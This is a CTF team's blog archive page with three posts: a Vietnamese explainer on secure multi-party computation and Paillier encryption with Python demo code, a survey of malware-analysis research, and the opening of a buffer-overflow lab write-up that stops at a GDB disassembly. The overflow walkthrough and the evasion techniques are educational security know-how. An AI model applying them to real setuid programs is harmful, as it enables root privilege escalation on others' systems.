chuymichxinhdep – BabyPhD CTF Team

An toàn tính toán đa thành viên

chuymichxinhdep — Wed, 07 Sep 2016 11:24:32 +0000

Multi-Party Computation (MPC) là một khái niệm được các nhà mật mã học đắn đo nghiên cứu tận những thập niên 80 thế kỷ trước. Xuất phát tự nhiên từ những bài toán học búa trong cuộc sống phải đặt ra một giao thức hay ho hơn để đánh đố nhau. Ví dụ năm 1982 đó là bài toán triệu phú của anh Yao (1982 Andrew Yao 1), diễn Nôm đơn giản là anh Bin có số A tiền, còn anh Job có số B tiền. Hai anh trong một cuộc nhậu lỡ thách nhau xem ai có nhiều tiền hơn ai . Nhưng hai anh đều không muốn lộ ra tổng số tiền mình có cho nhau biết. Do đó mới nảy sinh bài toàn chứng minh bất đẳng thức A ≥ B mà không lộ thông tin nào của A và B cho bất cứ ai, kể cả 2 anh Bin và anh Jobs. Giải quyết xong bài toàn này đã mở ra một kỷ nguyên mới cho bảo mật thông tin đặc biệt là thương mai điện tử, data mining khi muốn so sánh các giá trị, tính toán cộng trừ nhân chia mà vẫn bảo vệ được thông tin mật như số tiền, tổng tiền trong tài khoản khách hàng, thông tin nhân khẩu học v.v.

1. MPC

Tổng quát hóa bài toán của Yao đó là: giả sử có n thành viên bảo mật cho n giá trị tương ứng , và tất cả các thành viên thực hiện phép tính sao cho các giá trị được bảo mật hoàn toàn. Trong định nghĩa này, bài toán của Yao là trường hợp nhỏ với và phép tính

Ví dụ thứ hai đó là trò chơi tình yêu, như các bạn đọc biết yeuchimse là một thanh niên ủy mị ướt át, sến rện hay nghĩ lung tung. Sẻ đệ lần đầu tiên không dám tỏ tình vì sợ người ấy không thích mình thì thật là quê độ nên đã yêu cầu chuymichxinhdep thiết kế một giao thức sao cho:

Eligibility: được thổ lộ và chỉ thổ lộ môt lần.
Privacy: đảm bảo không lộ thông tin đã thổ lộ cho bất kỳ ai biết, cho dù đó là người ấy hay chính chuymichxinhdep
Universal Verifiability: ai cũng có thể check được kết quả là 2 đứa nó có đến được với nhau hay không để đảm bảo tính công bằng của cuộc chơi tình ái.
Robustness: Mọi hành động gian trá ví dụ như thổ lộ có yêu sau đó lại thay đổi ý kiến là không yêu đều bị cấm.

4 tiền đề trên các bạn đọc nào thông minh có thể áp dụng vào bầu cử điện tử, tuy nhiên giao thức chuymichxinhdep thiết kế dưới đây sau này được biết đến rộng rãi dưới cái tên Five-Card Trick (Bert den Boer, Eurocrypt 1989) như sau:

Five-Card Trick (Bert den Boer, Eurocrypt 1989)

Với 5 lá bài Át, mặc định một chiếc lá Át cơ đỏ đặt sẵn trên bàn. Với các câu trả lời giữa 2 người tham gia trò chơi là Yêu hoặc không Yêu tương ứng với 2 cách xếp bài Át cơ, Át bích. Sau khi đặt bài xuống bàn (có thể thay đổi chiều hàng 5 bài để không ai biết câu trả lời của mình ở bên nào) thì kết quả cả 2 người đều có cảm tình với nhau chỉ xảy ra khi có 3 quân Át cơ nằm cạnh nhau. Trường hợp kết quả 2 người không hợp nhau thì vẫn đảm bảo cô gái không biết được đối phương trả lời là Yêu hay không Yêu. (Thật là vi diệu phải không? )

Để giải thích cách giải này, thực chất đó chính là bảng AND toán tử ở bảng này:

Kết quả xy=1 thì rõ khi và chỉ khi x=1 và y=1. Còn với xy=0 thì ta chỉ kết luận có 1 trong x hoặc y trả lời 0 mà không thể khẳng định rõ ai trả lời 0 hay 1. Kết quả lần thực nghiệm protocol đó như các bạn đã biết, cuộc sống rất ồn ào, có những kẻ thất tình không biết trốn vào đâu để ngồi một mình và tìm sự tĩnh lặng cho riêng mình nên đành chơi CTF. “Em chưa lấy chồng là lỗi của anh!”. Với love game thì đen bạc còn đỏ tình nhưng yeuchimse đen thôi, đỏ vẫn vậy.

2. OT

Để hóc búa hơn, người ta đã phát minh ra giao thức rất hay ho đó là Chuyển giao không lộ thông tin ( Oblivious Transfer ) đơn giản thế này: Anh Mao giữ 2 giá trị là bít tức là chỉ có 0 hoặc 1, chị MaiAnh giữ một giá trị secret s, tất nhiên, cũng chỉ là bít 01. Chị chọn một số u ngẫu nhiên khá to trong tập nguyên Z và chị tính với . Do s là bit nên lúc này chị có 2 giá trị , chị gửi cả 2 giá trị này lại cho Mao với mục đích làm Mao không biết giá trị u, s là gì, kể cả giá trị ở đây là generator chung mà cả 2 đều biết, thì theo bạn ElGamal đối với máy tính cổ lỗ của Mao là con MBP 15 inch đời giữa 2015, tới lúc bốc mộ cũng không giải ra được u (à mà với điều kiện là chị MaiAnh có u rất to nhé). Sau bước này thì Mao chọn 2 giá trị cũng ngẫu nhiên trong tập nguyên để tính một phương trình phức tạp hơn đó là:

Rồi Mao chuyển lại cặp để cho MaiAnh tính ra . Như vậy, Mao không để lộ cả 2 giá trị , trong khi MaiAnh không để lộ mà vẫn lấy được về. Mao cũng không biết được MaiAnh đã lấy số nào về mà chỉ biết MaiAnh đã lấy được 1 số. Tóm tắt lại trong hình như sau:

Câu hỏi đặt ra OT sẽ được áp dụng như thế nào, ví dụ anh Mích đang làm hệ thống e-Health sức khỏe y tế điện tử. Vì anh là bên thứ 3 làm tin học nên tất nhiên anh không được ông quan thanh liêm nào cho tiếp cận vào hồ sơ y tế của bệnh nhân. Do đó anh quyết định ký hợp đồng với bệnh viện sử dụng OT để làm API truy cập thông tin. Lúc này anh làm demo nên cơ sở dữ liệu mới có thông tin HIV của 2 bệnh nhân lưu dưới dạng dương tính (1) và âm tính (0). Áp dụng OTP anh Mích đã có thể biết trạng thái HIV của 1 trong 2 bệnh nhân mà bệnh viên không biết anh đã query bệnh nhân nào.

3.ZKP

Bệnh cạnh việc dùng OT để chia sẻ không lộ thông tin, người ta còn nghĩ ra nhiều trò phức tạp khác dưới cái tên ZKP (Zero Knowledge Proof) điển hình là bài toán lên bar của chụy Mích được trình bày như sau: Trong một lần trên bar hơi muộn vào khoảng 2 giờ sáng thì các anh pokemon ập vào đòi kiểm tra hành chính với lý do trên 18 tuổi mới được ngồi bar hút thuốc bú diệu như một số hoa hậu nào đó. Vốn là một người tôn trọng quyền con người chụy không muốn ai phán xét vì hút thuốc lá là quyền tự do của mỗi người. Chụy chân thành chúc mừng bạn chụy nếu em bỏ được thuốc, còn không em cũng đừng buồn vì sau một thời gian nghỉ, điếu thuốc sắp tới em hút đảm bảo nó sẽ ngon không bút nào tả xiết. Ngoài ra lại vốn là một người tôn trọng quyền con người chụy cũng không muốn để lộ liễu ngày sinh nhật của mình giữa chốn đông người. Thay vì trình ID CMND hay bằng lái chụy đã show thẻ ngân hàng của mình để quẹt bill cho các anh xem. Với luật trên 18 tuổi mới được làm credit card nên mặc nhiên chụy đã chứng minh mình đã trên 18 tuổi mà không để lộ ngày sinh của mình .

Một ví dụ ZKP thứ 2 đó là ví dụ hang động của AliBaBa:

Nhi tuyên bố rằng cô biết mật mã để mở cửa hang. Líp hỏi cô phải chứng minh tuyên bố của mình. Nhưng Nhi không thể nói mật khẩu cho Líp vì như vậy thật là lộ liễu . Do đó chụy Mích đã chỉ cho Nhi một cách như sau:

Líp đứng quay mặt tụt quần ở một khoảng cách khá xa và chờ Nhi bước vào hang.
Sau đó, Líp đến cửa hang rõ ràng anh ta không biết Nhi đã đi sang bên nào.
Líp tùy ý hét lên yêu cầu Nhi bước ra từ bên trái hoặc bên phải.
Hai đứa lặp lại trò chơi này cho đến khi Líp bị thuyết phục hoặc Nhi chán không chơi nữa.

Rõ ràng nếu Nhi đã ở phía bên trái và Líp yêu cầu cô ấy đến từ bên trái thì quả này Nhi đã may mắn . Nếu không, Nhi chỉ có thể đến từ bên trái nếu cô ấy biết mật mã để mở cửa hang phải không nào (!?).

4.Hệ mật đồng cấu( Homomorphic cryptosystem)

Để tiếp tục là cuộc chơi thêm phần phức tạp, các nhà mật mã học lại tiếp tục nghĩ ra Hệ mật đồng cấu được định nghĩa:

Hệ mã hoá Elgamal có tính chất đồng cấu, nhờ nó có thể tính được kết quả trong cuộc bỏ phiếu “chọn một trong hai”, mà không cần giải mã từng lá phiếu. Sơ đồ chia sẻ bí mật Shamir phối hợp với hệ mã hoá Elgamal còn có tính chất đặc biệt hơn nữa, nhờ nó có thể chia lá phiếu thành nhiều mảnh, cử tri gửi mỗi mảnh cho một thành viên ban kiểm phiếu, khi khớp các mảnh phiếu lại sẽ được nội dung đầy đủ của lá phiếu. Bài báo này trình bày các tính chất trên và chỉ ra ứng dụng của chúng trong bỏ phiếu từ xa.Hệ mã hoá Elgamal có tính chất đồng cấu, nhờ nó có thể tính được kết quả trong cuộc bỏ phiếu “chọn một trong hai”, mà không cần giải mã từng lá phiếu. Sơ đồ chia sẻ bí mật Shamir phối hợp với hệ mã hoá Elgamal còn có tính chất đặc biệt hơn nữa, nhờ nó có thể chia lá phiếu thành nhiều mảnh, cử tri gửi mỗi mảnh cho một thành viên ban kiểm phiếu, khi khớp các mảnh phiếu lại sẽ được nội dung đầy đủ của lá phiếu. (ref2 Trịnh Nhật Tiến, Đặng Thu Hiền, Trương Thị Thu Hiền, Lương Việt Nguyên)

Để rõ thêm về vấn đề này, bạn đọc có thể xem lại bài Introduction to Threshold signature scheme. Lưu ý Elgamal có tính chất đồng cấu còn RSA thì không nhé . Ở khuôn khổ bài viết này chỉ trình bày thêm về hệ mã Paillier công bố năm 1999 như sau:

Giả sử n = pq và g là một phần tử đặc biết của nhóm cyclic Z dựa theo lũy thừa n sao cho . Khóa bí mật , khóa công khai (g, n). Với plaintext là thông điệp và một số r nguyên dương ngẫu nhiên thì hàm mã hóa được định nghĩa:

Lưu ý lcm = least common multiple ước chung nhỏ nhất. Và người ta thường chọn g=n+1 để thỏa mãn tính chất generator như sau:

Còn quá trình giải mã thì phức tạp hơn chút, đó là:

Vậy tại sao có RSA phổ cập nông thôn đã chất chơi người dơi rồi, các nhà mật mã học lại phải nghĩ ra hệ mật oái ăm này . Ấy là vì ở đây ta có random r, mỗi lần mã hóa lại có ciphertext khác nhau. Ngoài ra với mỗi ciphertext nếu không biết random r thì lại ra vô số message m thỏa khác nhau. Ngoài ra với tính chất đồng cấu giúp cho phép cộng (+) và lũy thừa (^) ta có thể thiết kế các giao thức mã hóa gửi đi ciphertext để một bên thứ ba tính toán, bên tính toán này chỉ trả về kết quả phép tính mà không biết giá trị mà bên cần tính đưa ra là gì

Ví dụ giao thức đơn giản Alice có publickey (để mã hóa) và 2 số tiền của 2 orders mà Bob đặt hàng đã được mã hóa [a], [b]. Alice không thể giải mã để biết a, b nhưng lại muốn tính tổng tiền [a+b]. Bob ở đây có secretkey có khả năng giải mã để tính phép cộng cho Alice nhưng hệ thông không muốn Bob biết Alice đang muốn tính gì.

Alice bằng việc sử dụng random khiến cho Bob không biết đường nào mà lần, dù anh có giải mã ra a mũ và b ngã thì vẫn không đoán được a,b là gì. Tuy nhiên cũng xin lưu ý ở đây rằng, để đảm bảo giao thức hoạt động ngon thì random cần có một độ dài k bits cần thiết nhé. Lúc implement bị hack thì đừng đổ cho chụy không nói trước .

5. Ví dụ ứng dụng

Phần này với bạn đọc nào hiểu rõ học thuật rồi có thể skip sang luôn phần like subcribe comment và share trên phây búc. Dưới đây chỉ là bài toán ví dụ đơn giản trẻ con sử dụng Pailler để bảo vệ các thông tin như: tuổi, thu nhập bằng Python.

Đầu tiên, giả sử tôi có một hệ cơ sở dữ liệu cần mã hóa Paillier với 3 cột: Tên, tuổi, thu nhập. Tôi xin ăn cắp thư viện Pure Python Paillier Homomorphic Cryptosystem (3) để mã hóa dưới đây:

from paillier.paillier import *
from timer import Timer
import random,string

def encrypt_db():
	print "Encrypting...."
	for p in session.query(Person):
		p.age = str(encrypt(pub, int(p.age)))
		p.income = str(encrypt(pub, int(p.income)))
		p.name = str(int(p.name.encode("hex"),16))
	session.commit()

def decrypt_db():
	print "Decrypting...."
	for p in session.query(Person):
		print decrypt(priv, pub, int(p.age)) ,decrypt(priv, pub, int(p.income)) , hex(decrypt(priv, pub, int(p.name ))).replace("0x","").replace("L","")

print "Generating keypair..."
priv, pub =  generate_keypair(2048)

Với quyền query lên database toàn bộ bị mã hóa, tôi có 2 bài toán cần giải quyết đó là:

Nhập lên một số x, yêu cầu trả lời câu hỏi có bao nhiêu người có độ tuổi lớn hơn x mà không làm lộ số x đang được hỏi.
Tính tổng thu nhập của tất cả những người có độ tuổi lớn hơn x mà không làm lộ thông tin thu nhập của từng người.

Đề giải quyết 2 bài toán trên, tôi tham khảo giao thức tính toán không làm lộ dữ liệu được cải tiến của Zerkin (4) bạn tôi như sau:

Hàm gửi lên để lấy kết quả ta chỉ cần quan tâm tới hàm A(pub, enc_a, enc_b). Ở đây được code như sau (code bừa hơi dài đề nghị không gạch đá ):

from paillier.paillier import *
import random,string

l=17
def A(pub, enc_a, enc_b):
	enc_z = e_add(pub, e_add(pub, enc_a, encrypt(pub, 2**l)), invmod(enc_b,pub.n_sq))
	r = random.randrange(2**(80+l+1))

	r_bin = bin(r).replace("0b","").replace("L","")
	r_bin = "0"* (l-len(r_bin))+r_bin
	r_bin = r_bin[::-1]
	enc_r = encrypt(pub, r)
	enc_d = e_add(pub, enc_z , enc_r)
	enc_d1, enc_d2 , enc_t = B1(enc_d)
	s = [-1,1][random.randint(0,1)]

	h = [0]*l
	v = [0]*l
	enc_c = [0]*l
	enc_e = [0]*l
	for i in range(l):
		while True:
			h[i] = random.getrandbits(long(round(math.log(pub.n, 2))))
			if h[i] > 0 and h[i] < pub.n and gcd(h[i], pub.n) == 1:
				break

	for i in range(l):
		v[i] = s - int(r_bin[i])
		for j in range(i+1,l):
			v[i] -= (2**j) * int(r_bin[j])
		if v[i] < 0: 
			v[i] = pub.n + v[i]
		enc_c[i] = e_add(pub, encrypt(pub, v[i]), enc_t[i])
		enc_e[i] = pow (enc_c[i], h[i],pub.n_sq)

	enc_lamda = B2(enc_e)
	if s != 1:
		enc_lamda = e_add(pub, encrypt(pub,1), invmod(enc_lamda,pub.n_sq))
	enc_zl = e_add(pub, e_add(pub, enc_d2, invmod(encrypt(pub,(r / 2**l)),pub.n_sq)), invmod(enc_lamda,pub.n_sq))
	return B3(enc_zl)

def B1(enc_d):
	d= decrypt(priv, pub, enc_d)
	d1 = d%(2**l)
	d2 = d/(2**l)
	d_bin = bin(d1).replace("0b","").replace("L","")
	d_bin = "0"* (l-len(d_bin))+d_bin
	d_bin = d_bin[::-1]
	t = [int(0)]*l
	for i in range(l):
		t[i] = int(d_bin[i])
		for j in range(i+1,l):
			t[i] += (2**j) * int(d_bin[j])
		t[i] = encrypt(pub, t[i])
	return encrypt(pub,d1) , encrypt(pub,d2),t
def B2(enc_e):
	e = [int(0)]*l
	for i in range(l):
		e[i] = decrypt(priv, pub, enc_e[i])
		if e[i] ==0: return encrypt(pub,1)
	return encrypt(pub,0)


def B3(enc_zl):
	return decrypt(priv,pub, enc_zl)

Vậy với bài toán 1, để biết bao người có số tuổi từ x đổ lên ta chỉ cần query bằng hàm A():

index = [-1]*len(income)	
for i in range(len(age)):
	enc_x = encrypt(pub, x)
	if int(A(pub, age[i],  enc_x))>0:
		index[number] = i
		number+=1

Với bài toán 2, để thêm phần bảo mật ta nhét thêm một số random r thật dài vào mỗi lần query như sau:

	r = random.randrange(2**(80+32))
	for i in index:
		if i>-1:
			totalincome = e_add(pub, totalincome, income[i])
	totalincome = e_add(pub, totalincome, encrypt(pub,r))
	totalincome = decrypt(priv,pub,totalincome) - r

Thật là đơn giản phải không , nếu bạn vẫn chưa hiểu, xin đừng liên hệ tôi vì tôi sẽ không giải thích đâu. Xin mời bạn đọc phần appendix nhé.

"Protocols for secure computations". FOCS. 23rd Annual Symposium on Foundations of Computer Science (FOCS 1982): 160–164.doi:10.1109/SFCS.1982.88
Mã hoá đồng cấu và ứng dụng http://tapchi.vnu.edu.vn/tckh/news/?1887/635/Ma-hoa-dong-cau-va-ung-dung.htm
https://github.com/mikeivanov/paillier
Z. Erkin, M. Franz, J. Guajardo, S. Katzenbeisser, R. L. Lagendijk and T. Toft, Privacy- Preserving Face Recognition, 9th International Symposium on Privacy Enhancing Technologies, LNCS 5672, pp. 235-253, August 2009.

Appendix:

Ứng dụng hệ mã hóa đồng cấu trong nhận dạng hình ảnh tội phạm (vẫn đảm bảo quyền bảo vệ hệ thống hình ảnh tội phạm, cũng như không làm lộ khuôn mặt người cần kiểm tra):

Tính toán không lộ thông tin (ghi chú phần 4)

Malware Analysis Overview for beginners

chuymichxinhdep — Thu, 07 Jul 2016 13:54:56 +0000

The malware threat landscape is continuously evolving. In this blog post, I would like to introduce the basic concept of malware and malware analysis, the ideas of both static and dynamic malware analysis. Besides, malware evasive techniques and novel solutions will be introduced as well as modern research such as automatic protocol RE and Android malware behavior analysis will be mentioned in last sections.

Basic principles of malware analysis

What is malware?

Software that “deliberate fulfills the harmful intent of an attacker”. It motivates to create tools to detect and mitigate malicious software. There is a common signature-base AV scanners which match pre-generated signatures against files. But this approach is error-prone task and not be able to detect unknown, specially tailored malware.

Types of malware: Worm, virus, Trojan horse, spyware, bot(net), rootkit.

Infection vectors: Exploiting vulnerable services, drive-by download and SE.

Malware analysis:

Static analysis: refers to techniques that verify the actions the program performs in practice, without actually executing it. Analysts often disassemble the program to understand their behaviors but it might result in ambiguous results if the binary uses self modifying code techniques (e.g., packer programs). Additionally, malware relying on outside values cannot be statically determined correctly (e.g., current system date, indirect jump instructions) Therefore, it is necessary to develop analysis techniques that are reliably analyze malicious software.

Dynamic analysis: refers to techniques that execute functions, verify the actions the program performs in practice by executing it. To monitor what functions are called is to intercept function calls (hooking). Then output the invocation to a log file or analyze input parameters or output results. There are 3 kinds of function calls: API, system calls and Windows Native API.

Implementing function hooking: by inserting to source code (if exists), binary rewriting using Detours library, debugging techniques, replacing dynamic shared libraries.

To analyze function parameter: Information flow tracking (taint sources and sinks), irect data dependencies (taint labels), address dependencies, control flow dependencies, implicit information flow.

Implementation strategies for malware analysis:

Analysis in User-/Kernel-mode: ease to invoke functions or API calls.
Analysis in emulator: Memory&CPU emulation (libemu, qemu etc.), full system emulation (Boshs, etc.)
Analysis in Virtual Machine
Network simulation: no internet but simulated network, or filtered network.

An example of static analysis - Metamorphic malware analysis and real-time detection

Metamorphism [4] is a technique that mutates the binary code using different obfuscations. It changes the opcodes with each run of the infected program and does not use any encryption or decryption (different from Polymorphism). The malware never keeps same sequence of codes in the memory.

The authors present a new framework named Metamorphic Malware Analysis and Real-Time Detection (MARD). It builds a behavioral signature and detect metamorphic malware in real-time using two techniques: ACFG (Annotated Control Flow Graph) provides a faster matching of CFGs, without compromising detection accuracy and SWOD-CFWeight (Sliding Window of Difference and Control Flow Weight) mitigates and addresses key issues in current techniques, related to the change of the frequencies of opcodes, such as the use of different compilers, compiler optimizations, operating systems and obfuscations.

Fig 1. Overview of MARD

Metamorphic Malware Analysis and Real-Time Detection (MARD)

First, a training dataset Malware Templates is built using the malware training samples. After a sample is translated to Malware Analysis Intermediate Language (MAIL) and to a behavioral signature, the Similarity Detector detects the presence of malware in the program, using the Malware Templates. All the steps as shown are completely automated. The tool automatically generates the report after all the samples are processed.

Annotated Control Flow Graph detection technique

A sample is initially disassembled and translated to a MAIL program. The MAIL program is then annotated with patterns, then they build a CFG of the annotated MAIL program yielding the corresponding ACFG. The constructed ACFG becomes part of the signature of the program and is matched against a database of known malware samples to see if the program contains a malware or not. For detecting unknown malware, the authors build an ACFG for each function in the program is built. Then divide a program into smaller ACFGs, with one ACFG per function instead of building a large ACFG as signature. A sample which contains part of the control flow of a training malware sample, is classified as a malware, i.e. if a percentage (compared to some predefined threshold) of the number of ACFGs involved in a malware signature match with the signature of a sample then this sample is classified as a malware.

Sliding Window of Difference and Control Flow Weight detection technique

Shahid Alam et al propose a new opcode-based malware detection technique by transforming the assembly code to an intermediate language that makes the analysis independent of different compilers. Then they extract and analyze the control flow semantics of the program in order to mitigate the effect of obfuscations by polymorphic and metamorphic malware. The control flow semantics were applied by statistical analysis of opcode distributions to develop a set of heuristics.

Evaluation

Out of the 10 systems, ACFG clearly shows superior results and, unlike others is fully automatic, supports malware detection for 64 bit Windows (PE binaries) and Linux (ELF binaries) platforms and has the potential to be used as a realtime detector.

Fig 2. Comparison of ACFG with the metamorphic malware detection techniques based on control and information flow analysis.

Dynamic malware behavior analysis

The paper [3] implement an automated approach to extract malware behaviors by observing all the system functions calls in virtualized environment. A virtualized W32 machine is created through wine with common Windows system configuration and an emulated network infrastructure. Execution monitor, environment is controlled via SSH.

Analyzing malware behavior

Malware behavior: The authors create a set of actions (virtual operating system function call) that a malware M can perform.

Determination of malware actions: There is an important issue that they must differentiate between function calls called by operating system and by malware. Gerard Wagener et. al create a set of return memory addresses to characterize correctly executed functions.

Malware behavior similarities: 2 malware behaviors are compared with each other and a similarity function is evaluated. This function compares pair-wise all the action and attaches scores for matching. A malware with low similarity can be seen as unknown behavior and vice versa.

Distance between malware behaviors: The previous comparison technique only consider the similarity of function call order. In some cases, the malfunctioned activities can run concurrently or depends on the operation scheduler. Then they improve the model by rely on the frequencies of function calls as well by using Hellinger distance. Besides, a malware did not call a function does not mean it never calls these functions. So they apply the technique of statistical smoothing then show how many information is contained in a malware behavior.

Phylogenetic tree for malware: A phylogenetic tree is a branching diagram or "tree" showing the relationships among various biological species based upon similarities and differences in their genetic characteristics. The authors apply a binary tree by grouping similar nodes based on the previous similarity matrix until the matrix is empty.

Experimental validation

Malwares are captured through a honeypot called Nepenthes.
They created some anti-RE binaries to include as a behavior should be observed.
They created obfuscated assembler code, used a debugger to see the code changes its behavior or not.
They handled sleep(), exception division by zero (which is often used as an anti-sandbox), observed virtual operating system environment.

Using above sequences to compute the similarity, they generated a top 10 list of most common malware behavior, average similarity etc. and used AV software to explain the similarity. Then they applied phylogenetic tree to highlight 3 malware families then built 2 trees based on similarity matrix and Hellinger distance matrix.

The authors introduced the automated malware behavior analysis, then they can detect 0day malware based on low average distance similarity from real world data. It is considered that malwares behave similarly at the beginning, it means the malware author copied parts from previous malware. They plan to extend the work with better heuristics and a differentiated analysis.

The malware analysis arms race and its consequences

Malware evasive techniques

Self-modifying code and packers [1]: The malware self modifies its binary and store data in memory using encoding or encryption techniques. It also can be polymorphic using different encryption keys. Countermeasures are RE the unpacking algorithm, generic detection and reconstruction of packed code (catching the original binary in process address space).

Detection of Analysis environment: Malware tries to detect analysis platforms based on: Hardware fingerprint, execution environment (eg. IsDebuggerPresent()), external applications (such as debuggers), behavioral. Mitigations are eliminating the differences between analysis environment and real environment or modifying the malware during execution to force the wanted path to be executed.

Logic bombs: A malware might only execute on a certain date or reliance on user input.

Analysis performance: The execution of malware analysis might slow down the timing in the operating system which executes malware. Countermeasures: RDTSC time-stam counter register, slowing down time in an emulated/virtual environment; terminate the analysis once a given timeout process.

Malware analysis tools

In order to deal with thousands of malwares with modern techniques, security analysts create many novel tools to ease these challenges.

Anubis: analysis of unknown libraries based on TTAnalyze, executes the sample in a Windows OS, focus on the executed operations on behalf of the sample, and produce a report (now support Android APK as well).
Multiple path exploration: This tool recognizes a branching point whenever a control flow decision is based on data outside the monitored process. Then it is detected if a control flow decision is based on a return value of a system call (e.g., the current system time). Multiple path exploration is a countermeasure of logic bombs.
CWSandbox: a virtual environment based on invoking API functions by injecting DLL to the running process. Then it analyze malware behavior and produce a malware analysis report.
Norman Sandbox: also used in [3] to reference to anti-emulation code. The Norman Sandbox provides a simulated environment with fake impression that it is running on a real system to the sample under analysis that consists of custom-made versions of user-land APIs necessary for the sample to execute.

Bare-metal Analysis-based Evasive Malware Detection

Nowadays, malwares become more and more sophisticated especially improved techniques to identify analysis environment and refraining from performing malicious actions. In this section, I introduce the research of BareCloud [5] - an automated evasive malware detection system based on bare-metal dynamic malware analysis. This is a novel approach of hierarchical similarity-based malware behavior comparison to analyze the behavior of a sample in the various analysis systems.

Bare-metal system overview

The bare-metal malware analysis system is a cluster of hardware-based modular worker units based on a remote storage disk. The bare-metal system also has a software-based remote control mechanism to automate the malware execution process on the workers. This mechanism is based on the IPMI remote administration features,iSCSI protocol (Internet Small Computer System Interface) to attach remote disks to worker units, Logical Volume Manager (LVM)-based copy-on-write snapshots to host the remote disk used by the analysis system running on the worker units. After the completion of each malware analysis, the corresponding volume snapshot is recreated from a clean volume.

The bare-metal malware analysis system is a real hardware-based hence there is really difficult for malware to identify the analysis environment. With these network log and disk capture, the authors make a behavior comparison after applying behavior deviation, behavioral profile, behavior extraction and hierarchical similarity.

Evaluation

The experiments show that research produces better evasion detection results compared to previous methods. BareCloud was able to automatically detect 5,835 evasive malware out of 110,005 recent samples.

Automatic protocol RE

Previous sections focus on techniques to analyze and classify malware based on hooking functions, system calls. However, understanding the C&C botnet’s protocol is a hard work and analysts need to rewrite every sent and received messages. In the next section, I will introduce Dispatcher [2] – an automatic protocol RE to analyze botnet networking communication.

Dispatcher implementation overview

The captured output buffer (in case of encrypted protocols, they capture the buffer before being encrypted and sent or they capture the buffer after being decrypted and received, therefore they can obtain unencrypted data) will be deconstructed to build message field tree.

Fig 3. Message field tree and Field semantics identified by Dispatcher

To infer the field semantics, Juan Caballera et al. use type-inference-based technique that leverage the observation that many functions and instructions are used by known programs contain semantic information. Such interference is general and can be used to identify large scale of field semantics such as cookie, timestamps, hostname, port, IP address etc.

Combining 2 above solutions, the authors introduced Dispatcher which firstly makes a forward pass over the execution trace collecting information needed using loop analysis, callstack analysis and buffer liveness analysis. Then it use a recursive process to deconstruct the buffer based on program locations, dependency chains (a sequence of write operations). Dispatcher infer the field attributes eventually by determine: keywords, length fields, delimiters, variable-length fields and arrays.

Evaluation

The authors evaluate these techniques on MegaD C&C which uses a proprietary encryption protocol on port 443 (instead of SSL) and they successfully rewrite and summarize its field semantics and compare this with unencrypted messages using BinPac. Besides, they evaluate their techniques on 4 open protocols: HTTP, DNS, FTP and ICQ. The results show that the accuracy of the message format automatically extracted by Dispatcher can rival that of Wireshark, without requiring a manually generated grammar.

Automatically Reconstruct Android Malware Behaviors

With a huge user base of Anroid mobile devices, Android malwares are rising with an alarmingly pace. This section I will summarize basic concepts of CopperDroid [6], an approach built on top of QEMU to automatically perform out-of-the-box dynamic behavioral analysis of Android malware.

CooperDroid

Fig 4. CooperDroid Architecture

The whole Android system runs on top of the CopperDroid emulator based on qemu (a generic and open source machine emulator and virtualizer). It enhances the Android emulator to enable system call tracking and support our out-of-the-box system call-centric analyses. The communication between host and emulator is using GDB support.

Tracking System Call Invocations: This is the basic dynamic malware analysis technique mentioned in 2.4. However, the ARM architecture underlying the Android operating system and CopperDroid swi instruction for invoking system calls which are different from Windows/Linux OS.
Binder Analysis: Dissecting interprocess communication (IPC) and remote procedure calls (RPCs). Android uses Binder which allows a Java process to invoke methods of remote objects as if they were local methods, through synchronous calls. CopperDroid carry out a detailed analysis of communication channels to specify behaviours of malicious Android applications. For example, when sending a SMS message, the system invokes service isms and remotely invoking its sendText function with the proper arguments. CopperDroid catches the arguments of each binder-related ioctl system call to reconstruct the remote invocation.
Path Coverage: Unanalysed path is exacerbated when mobile applications are user driven and interaction with applications. To address this problem, CopperDroid implements an approach based on extracting information from the Manifest to stimulate the analyzed sample with a number of events of interest. For example, injecting events such as phone calls and reception of SMS texts would lead to the execution of the registered application's broadcast receivers.

Results

The authors observed an average of 28% additional behaviors on more than 60% of the Android Malware Genome Project's samples, and an average of 22% additional behaviors on roughly 73% of the Contagio's samples.

References

[1] Egele, Manuel, et al. "A survey on automated dynamic malware-analysis techniques and tools." ACM Computing Surveys (CSUR) 44.2 (2012): 6.

[2] Caballero, Juan, et al. "Dispatcher: Enabling active botnet infiltration using automatic protocol reverse-engineering." Proceedings of the 16th ACM conference on Computer and communications security. ACM, 2009.

[3] Wagener, Gérard, Radu State, and Alexandre Dulaunoy. "Malware behaviour analysis." Journal in Computer Virology 4.4 (2008): 279-287.

[4] Shahid Alam, R.Nigel Horspool, Issa Traore, Ibrahim Sogukpinar. “A framework for metamorphic malware analysis and real-time detection”. Computers & security 48 (2015) 212-233

[5] Dhilung Kirat, Giovanni Vigna, and Christopher Kruegel. “BareCloud: Bare-metal Analysis-based Evasive Malware Detection”. Proceedings of the 23rd USENIX Security Symposium. ISBN 978-1-931971-15-7

[6] Alessandro Reina, Aristide Fattori, Lorenzo Cavallaro. “A System Call-Centric Analysis and Stimulation Technique to Automatically Reconstruct Android Malware Behaviors”. In the Proceedings of the 6th European Workshop on Systems Security (EuroSec).

Writeup for beginners - BoF Vulnerability Lab (Syracuse University)

chuymichxinhdep — Sat, 12 Mar 2016 16:02:46 +0000

Visitors sometimes feel bored with our web blog because of too many boring stuffs which not often appear in their casual work/study. I just want to post such a simple tutorial for beginners and if you are experienced in CTF's pwn then just skip it. Enjoy!

Reference: BoF Vulnerability Lab (Syracuse University)

Return to Shellcode
===================

The program stack.c has 2 functions: main() and bof() which has a buffer overflow vulnerability. Main function reads an input from a file called “badfile”, and then passes this value to function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() has only 24 bytes long. Buffer overflow will occur because strcpy() does not check boundaries. Since this program is super-uid executable, if a normal user can exploit this buffer overflow vulnerability, any user might be able to execute shellcode under root privilege. It should be considered that the program gets its input from a file called ’badfile’, system environment variables and argument variables. They are under our control hence there are many approaches to spawn a root shell.
Some conditions in the first task are described as following:

- The vulnerable program was compiled with chmod 4755 under
root permission.

- It was built with options: execstack and -fno-stack-protector to
turn off the non-executable stack and StackGuard protections.

- ASLR was turned off.

Inside the function bof(), the buffer variable is defined as an array of 24 chars. It can be easily overflowed with a longer string str which reads from “badfile”. However, the defined variable on stack depends along both operating system and the compiler. Result of GDB will help us to make sure the size of stack certainly:
(gdb) disas bof
Dump of assembler code for function bof:

0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x38
0x0804848a <+6>: mov eax,DWORD PTR [ebp+0x8]
